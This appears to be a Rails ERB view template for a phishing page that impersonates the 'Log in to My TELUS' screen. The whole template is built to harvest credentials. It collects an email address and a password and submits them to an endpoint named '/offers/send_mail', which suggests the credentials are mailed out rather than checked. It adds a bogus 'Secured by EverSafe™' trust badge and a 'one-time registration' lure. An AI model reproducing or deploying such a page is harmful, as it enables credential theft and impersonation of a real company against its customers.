<div class="split-layout">
  <div class="left-section d-flex justify-content-end align-items-center">
    <form action="/offers/send_mail" method="post" class="login-form">
      <div class="mb-2 mt-2">
        <h2 style="color: rgb(75, 40, 109) !important;">Log in to My TELUS</h2>
      </div>

      <div class="mb-3 mt-3">
        <label style="font-weight: bold">Email or username</label>
        <input
          type="email"
          id="email"
          name="email"
          placeholder="Email"
          class="form-control form_input"
          required
        >
        <label style="font-weight: 200">Forgot your email/username?</label>

      </div>

      <div class="mb-3">
        <label style="font-weight: bold">Password</label>
        <input
          type="password"
          id="password"
          name="password"
          placeholder="Password"
          class="form-control form_input"
          required
        >
      </div>

      <div class="form-check mb-3">
        <input class="form-check-input" type="checkbox" id="noteCheck">
        <span>Note! It's a one-time registration</span>
      </div>

      <button type="submit" class="login-btn mb-4">
        Continue
      </button>

      <div class="or-divider">
        <span>or</span>
      </div>

      <button class="login-btn mb-4" style="background: white !important; color: #2b8000; border: 2px solid #2b8000 !important;">
        Send me a link to login
      </button>

      <div style="text-align: center">
        <p style="font-size: 20px; color: "black">New to My TELUS? <span style="color: #2b8000 !important">Register now</span></p>
        <p style="font-size: 20px; color: #2b8000 !important">Log in to your TELUS email</p>

        <p style="font-size: 20px;"><%= image_tag "leaf.svg", alt: "Leaf",  width: 25, height: 25 %>Secured by <span style="font-weight: 500">EverSafe™</span></p>



      </div>
    </form>


  </div>

  <div class="right-section">
    <div
      class="image-container"
      style="background-image: url(<%= asset_path('bg_new.png') %>);"
    ></div>
  </div>
</div>
